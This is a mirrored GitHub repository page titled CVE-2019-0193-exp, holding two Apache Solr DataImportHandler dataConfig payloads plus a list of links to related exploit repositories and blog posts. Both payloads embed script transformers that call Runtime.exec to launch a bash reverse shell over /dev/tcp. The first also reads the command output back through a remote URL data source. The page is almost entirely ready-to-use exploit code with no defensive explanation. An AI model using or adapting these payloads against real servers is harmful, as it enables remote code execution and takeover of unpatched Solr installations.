Giters

jaychouzzk / CVE-2019-0193-exp

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2019-0193-exp

1

<dataConfig>


  <dataSource type="URLDataSource"/>
  <script><![CDATA[

          function poc(row){

 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/9999 0>&1")));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));

return row;

}


  ]]></script>

        <document>
             <entity name="entity1"
                     url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                     processor="XPathEntityProcessor"
                     forEach="/RDF/item"
                     transformer="script:poc">
                        <field column="title" xpath="/RDF/item/title" />
             </entity>
        </document>
</dataConfig>

2.jdbc:

<dataConfig>
<dataSource type="URLDataSource"/>
  <script><![CDATA[ java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/9999 0>&1");
  ]]></script>
  <document>
    <entity name="a"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:" />
  </document>
</dataConfig>

参考链接

https://github.com/jas502n/CVE-2019-0193

https://blog.spoock.com/2018/11/25/getshell-bypass-exec

https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA

https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA

https://github.com/Imanfeng/CVE-2019-0193

https://github.com/1135/solr_exploit#%E6%A3%80%E6%B5%8B%E6%BC%8F%E6%B4%9E---exploit1

About